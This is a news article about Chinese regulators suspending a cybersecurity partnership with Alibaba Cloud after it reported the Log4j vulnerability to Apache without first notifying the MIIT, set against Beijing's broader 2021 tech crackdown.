Smartphone with the Alibaba Cloud logo in a clenched hand on the background of the Chinese flag showing Chinese regulators over Log4j vulnerability

Alibaba Cloud Deal Nixed by Chinese Regulators Over Failure To Report Log4j Vulnerability

In late November, Alibaba’s security team was the first to notify the Apache Software Foundation (ASF) about the devastating Log4j vulnerability. Though Alibaba Cloud was not known to be compromised, the company is nevertheless facing consequences from Chinese regulators.

The Ministry of Industry and Information Technology (MIIT) is taking Alibaba to task over not reporting the breach to its officials first. The consequence will be a suspension of the cybersecurity relationship between the Chinese government and Alibaba Cloud for six months, something that could be costly for the tech and retail giant. The state is one of its largest customers, and one that it relies on more heavily since ByteDance opted to move to its own international cloud storage earlier this year.

Alibaba Cloud takes a hit over Log4j reporting

As part of a package of new security and data protection regulations passed in 2021, Chinese regulators expect to be informed of discovered vulnerabilities before they are disclosed to the public. The Alibaba researchers, possibly overcome with how serious the Log4j vulnerability (Log4Shell) could be for the world, seem to have overlooked this step.

MIIT has a cooperative partnership with Alibaba Cloud for data sharing regarding cybersecurity threats and monitoring of platforms, something that will apparently be mothballed until mid-2022.

The team at Alibaba initially kept communications with Apache about Log4j confidential due to the seriousness of the vulnerability, but a Chinese blogger leaked inside information about the remediation process on December 8. This forced Apache to hurry out a patch on December 10 as the Log4j issue was easily exploitable even by non-technical actors and could potentially compromise as many as three billion Java-using devices throughout the world.

Alibaba Cloud has responded to the announcement by admitting that it did not notify Chinese regulators in a timely enough fashion and saying that it will work to improve its compliance and risk management posture.

Log4j has certainly thrown a scare into both governments and private enterprise. The security hole stems from Minecraft, of all places, where gamers discovered that arbitrary code could be executed through the chat feature by signaling the remote machine to log it. Though simple and easy to execute, the attacks on Log4j are not so easy to bottle up given the ubiquity of the tool (particularly in open source packages that countless servers and sites rely on). While the vulnerability can be fixed by simply updating to the most recent version of Log4j, that does not help consumers or organizations that do not have that sort of access to the packages and libraries in which it is found (some 8% of all Java artifacts listed on Maven Central, about 4x the amount affected by the largest previously known security flaws).

Chinese regulators continue to tighten grip on domestic tech firms

Amidst a number of other new laws, Chinese regulators passed the “Provisions on Security Loopholes of Network Products” in September 2021. Under the terms of the law, the government required the Alibaba Cloud team to report the Log4j vulnerability to the manufacturer immediately (which they did) and the MIIT within two days (the part that got them into trouble). MIIT says that it was not aware of the Log4j issue until December 9, the day after it was leaked to the entire internet via the anonymous blogger.

Chinese regulators spent much of 2021 cracking down on private enterprise, particularly the domestic tech sector. In total the new rules and regulations are thought to have erased about $3 trillion in value as the government forbade firms from doing IPOs overseas, suspended apps for not fully complying with privacy laws and issued major fines to some of the country’s largest companies.

According to the government line, the recent rampage by Chinese regulators is meant to promote social stability and strengthen the economy. While it is true that Chinese tech companies have largely been allowed to play fast and loose with user data prior to the past year or two, Beijing also appears to want to steer financial offerings to Shanghai or Hong Kong and also to keep tech platforms from accumulating too much independent power.

Alibaba Cloud is not the first of the Alibaba family to find itself in the crosshairs.  In April Alibaba was hit with the largest fine in the country’s history, $2.8 billion, for operating as a monopoly. And the entire campaign by Chinese regulators unofficially kicked off in November of 2020 when Alibaba subsidiary Ant Group had its overseas IPO suddenly pulled by the government, also leading to the mysterious disappearance of Jack Ma for several weeks. Ant Group is estimated to have lost half its value since.

The Chinese government has a pattern of developing (and sticking to) five-year plans. In August, President Xi Jinping announced that the crackdown on tech companies was a part of the current five year plan and Chinese regulators could be expected to continue with big fines and harsh responses to violations of the rules for years.